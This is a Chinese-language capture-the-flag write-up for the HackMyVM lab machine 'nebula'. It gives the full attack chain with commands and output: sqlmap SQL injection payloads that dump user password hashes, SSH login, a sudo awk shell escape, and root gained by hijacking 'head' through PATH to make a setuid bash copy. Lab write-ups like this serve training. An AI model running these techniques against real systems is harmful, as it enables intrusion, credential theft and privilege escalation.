hack-my-vm:nebula

端口探测

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.1.26                                                                                  [23:43:47]
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 23:44 CST
Nmap scan report for 192.168.1.26
Host is up (0.00098s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:FC:59:B0 (Oracle VirtualBox virtual NIC)

端口开放不多，也没有深入扫描的必要，直接开始渗透

80端口渗透

先去主页看看，是的，啥有用的都没有发现，好吧，其实是发现了一个登录框的，我猜测是有sql注入的，不过先不尝试，直接开始目录枚举

kali@kali [~] ➜  gobuster  dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.1.26                    [23:46:04]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.26
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 310] [--> http://192.168.1.26/img/]
/login                (Status: 301) [Size: 312] [--> http://192.168.1.26/login/]
/joinus               (Status: 301) [Size: 313] [--> http://192.168.1.26/joinus/]
/server-status        (Status: 403) [Size: 277]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

http://192.168.1.26/joinus/里面发现了好东西

点击之后下载了一个pdf，里面泄露了管理员的密码

直接登录，进入后台，猜测后台提供的id查询服务存在sql注入漏洞

直接拿url来测，猜测注入点就是id

kali@kali [~] ➜  sqlmap -u "http://192.168.1.26/login/search_central.php?id=1"                                                                   [23:49:40]
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:57:52 /2025-01-20/

[23:57:52] [INFO] resuming back-end DBMS 'mysql' 
[23:57:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4022=4022 AND 'lVHX'='lVHX

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1319 FROM (SELECT(SLEEP(5)))uOrx) AND 'WaFN'='WaFN

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7171707671,0x436a434b6e7364716671516d4247756c4453476245614a7264596974696d567758686c586c505345,0x71626b6b71),NULL,NULL-- -
---
[23:57:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:57:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.26'

[*] ending @ 23:57:52 /2025-01-20/

直接查询数据

[23:58:38] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] nebuladb

//库名


[23:58:51] [INFO] fetching tables for database: 'nebuladb'
Database: nebuladb
[3 tables]
+----------+
| central  |
| centrals |
| users    |
+----------+

//表名

Database: nebuladb                                                                                                                                         
Table: users
[7 entries]
+----+----------+----------------------------------------------+-------------+
| id | is_admin | password                                     | username    |
+----+----------+----------------------------------------------+-------------+
| 1  | 1        | d46df8e6a5627debf930f7b5c8f3b083             | admin       |
| 2  | 0        | c8c605999f3d8352d7bb792cf3fdb25b (999999999) | pmccentral  |
| 3  | 0        | 5f823f1ac7c9767c8d1efbf44158e0ea             | Frederick   |
| 3  | 0        | 4c6dda8a9d149332541e577b53e2a3ea             | Samuel      |
| 5  | 0        | 41ae0e6fbe90c08a63217fc964b12903             | Mary        |
| 6  | 0        | 5d8cdc88039d5fc021880f9af4f7c5c3             | hecolivares |
| 7  | 1        | c8c605999f3d8352d7bb792cf3fdb25b (999999999) | pmccentral  |
+----+----------+----------------------------------------------+-------------+

//数据

mysql帮助我们破解了hash，我们可以看到，还有一个管理员，猜测这个就是ssh可以登录的用户

kali@kali [~] ➜  ssh pmccentral@192.168.1.26                                                                                                      [0:02:44]
pmccentral@192.168.1.26's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-204-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 20 Jan 2025 04:03:14 PM UTC

  System load:             0.45
  Usage of /:              39.6% of 9.75GB
  Memory usage:            16%
  Swap usage:              0%
  Processes:               126
  Users logged in:         0
  IPv4 address for enp0s3: 192.168.1.26
  IPv6 address for enp0s3: 2409:8a70:2a31:d8b0:a00:27ff:fefc:59b0

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

48 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Last login: Mon Jan 20 16:02:14 2025 from 192.168.1.4
pmccentral@laboratoryuser:~$ whoami
pmccentral

拿到一个用户，但是很遗憾，没有flag

提权

pmccentral@laboratoryuser:~$ sudo -l
[sudo] password for pmccentral: 
Matching Defaults entries for pmccentral on laboratoryuser:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pmccentral may run the following commands on laboratoryuser:
    (laboratoryadmin) /usr/bin/awk

可以看到，我们可以使用laboratoryadmin用户无密码运行awk，我们去查找awk有关sudo的提权

Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo awk 'BEGIN {system("/bin/sh")}'

上面是查询到的awk的sudo提权命令，不理解可以让gpt解释，我们直接使用提权

pmccentral@laboratoryuser:~$ sudo -u laboratoryadmin  awk 'BEGIN {system("/bin/sh")}'
$ whoami
laboratoryadmin

拿到该用户的权限，但是其shell的交互性很差，我们发现该机器存在python3，我们使用python3启动一个更加稳定的终端

$ python3
Python 3.8.10 (default, Nov  7 2024, 13:10:47) 
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> exit()
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
laboratoryadmin@laboratoryuser:/home/pmccentral$ whoami
laboratoryadmin
laboratoryadmin@laboratoryuser:/home/pmccentral$ 

python3 -c 'import pty; pty.spawn("/bin/bash")'这是python3启动稳定终端[强交互性]的命令

直接跑linpeas看看机器上的敏感文件

-rwsr-xr-x 1 root root 87K Feb  6  2024 /snap/core20/2434/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Apr  9  2024 /snap/core20/2434/usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Feb  6  2024 /snap/core20/2434/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 67K Feb  6  2024 /snap/core20/2434/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 67K Apr  9  2024 /snap/core20/2434/usr/bin/su
-rwsr-xr-x 1 root root 163K Apr  4  2023 /snap/core20/2434/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 39K Apr  9  2024 /snap/core20/2434/usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-- 1 root systemd-resolve 51K Oct 25  2022 /snap/core20/2434/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 467K Jan  2  2024 /snap/core20/2434/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 129K Sep 15  2023 /snap/snapd/20290/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 177K Dec  4 09:13 /snap/snapd/23545/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 17K Dec 17  2023 /home/laboratoryadmin/autoScripts/PMCEmployees (Unknown SUID binary!)

上面是linpeas脚本列举的SUID文件的一部分，我们注意最后一个，在这个laboratoryadmin用户目录下面有一个文件，我们去看看

laboratoryadmin@laboratoryuser:~$ file /home/laboratoryadmin/autoScripts/PMCEmployees
/home/laboratoryadmin/autoScripts/PMCEmployees: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2e8e1b3a3f1bba666df17c97871f88b0377343fb, for GNU/Linux 3.2.0, not stripped

laboratoryadmin@laboratoryuser:~$ strings /home/laboratoryadmin/autoScripts/PMCEmployees
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
Showing top 10 best employees of PMC company
head /home/pmccentral/documents/employees.txt
:*3$"
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8061
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
PMCEmployees.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

head /home/pmccentral/documents/employees.txt我们在字符串中发现了这个命令，我们发现head命令并没有指定全路径，所以我们直接劫持head命令即可

laboratoryadmin@laboratoryuser:/tmp$ cat head 
cp /bin/bash /tmp/rootsh; chmod +xs /tmp/rootsh
laboratoryadmin@laboratoryuser:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
laboratoryadmin@laboratoryuser:/tmp$ cd /home/laboratoryadmin/autoScripts;./PMCEmployees;cd /tmp
laboratoryadmin@laboratoryuser:/tmp$ ./rootsh -p
rootsh-5.0# whoami
root

拿下，这个靶机不难